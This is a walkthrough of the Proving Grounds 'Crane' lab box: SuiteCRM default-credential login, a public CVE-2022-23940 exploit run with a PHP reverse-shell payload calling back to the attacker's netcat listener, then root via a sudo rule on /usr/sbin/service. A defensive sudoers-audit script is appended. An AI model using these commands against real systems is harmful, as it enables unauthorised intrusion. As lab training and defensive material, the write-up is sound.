Crane

Writeup for Crane from Offensive Security Proving Grounds (PG)

Enumeration

nmap scan:

Command executed: nmap -Pn -p- -A -T3 --open 192.168.183.146

Initial Access – Foothold

Browsing to the web server we located in the previous nmap scan shows a SuiteCRM management login prompt.

http://192.168.183.146

We used the default SuiteCRM credentials admin:admin, which gave us administrator access to the management system.

Checking the SuiteCRM version once logged in, under “About”, showed version 7.12.3.

A Google search confirms that SuiteCRM version 7.12.3 has a working public exploit.

Exploitation

Downloaded the exploit to the Kali box:

Command executed: git clone https://github.com/manuelz120/CVE-2022-23940

We started a listener on our Kali box using rlwrap and netcat.

Command executed: rlwrap nc -lvnp 7777

Executed the payload from the Kali box:

Command executed: ./exploit.py -h http://192.168.183.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.247\", 7777); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

Received a reverse shell as the “www-data” user.

Privilege Escalation

Further enumeration with sudo -l led me to a misconfiguration: the www-data user is allowed to execute /usr/sbin/service with root privileges without being prompted for a password.

Executed the following command, which gives us root access:

Command executed: sudo /usr/sbin/service ../../bin/sh
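As an added defensive check that is not part of the original writeup, the audit below flags sudoers rules of the kind abused here: a NOPASSWD grant on ALL, or on a binary such as service that will run whatever path it is handed, with no argument restriction. The sudoers sample is constructed, and the shell-capable binaries other than service are assumed examples.

```python
import re
# Constructed /etc/sudoers sample for the audit (not taken from the target box).
# The www-data rule mirrors the misconfiguration in the writeup: a NOPASSWD grant
# on /usr/sbin/service with no argument restriction, so any path can be "started".
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/sbin/service
backup   ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
deploy   ALL=(root) /usr/bin/systemctl restart app
"""

# Binaries that run a caller-chosen program when invoked as the runas user.
# Only service is on the page; the others are assumed, well-known examples.
SHELL_CAPABLE = {"/usr/sbin/service", "/bin/sh", "/bin/bash", "/usr/bin/env"}
# user host=(runas) [TAG:]... command[, [TAG:] command]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
                     r"(?:\((?P<runas>[^)]*)\))?\s*(?P<spec>.+)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*(.*)$")

def audit_sudoers(text):
    """Return (user, runas, command, reason) for every rule that hands out a
    passwordless shell: NOPASSWD on ALL or on an unrestricted shell-capable binary."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
        if not m:
            continue
        nopasswd = False
        for cmd in (c.strip() for c in m.group("spec").split(",")):
            while (t := TAG_RE.match(cmd)):           # tags carry to later commands
                nopasswd = t.group(1) == "NOPASSWD" or (nopasswd and t.group(1) != "PASSWD")
                cmd = t.group(2)
            parts = cmd.split()
            if not nopasswd or not parts:
                continue
            if cmd == "ALL":
                findings.append((m.group("user"), m.group("runas"), cmd, "ALL commands without a password"))
            elif parts[0] in SHELL_CAPABLE and len(parts) == 1:
                findings.append((m.group("user"), m.group("runas"), cmd,
                                 "no argument restriction on a binary that runs other programs"))
    return findings

if __name__ == "__main__":
    for user, runas, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user} -> ({runas}) {cmd}: {reason}")
```

Only the www-data rule is reported; the backup rule is not, because pinning the arguments (as that rule does) or dropping NOPASSWD is the fix.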
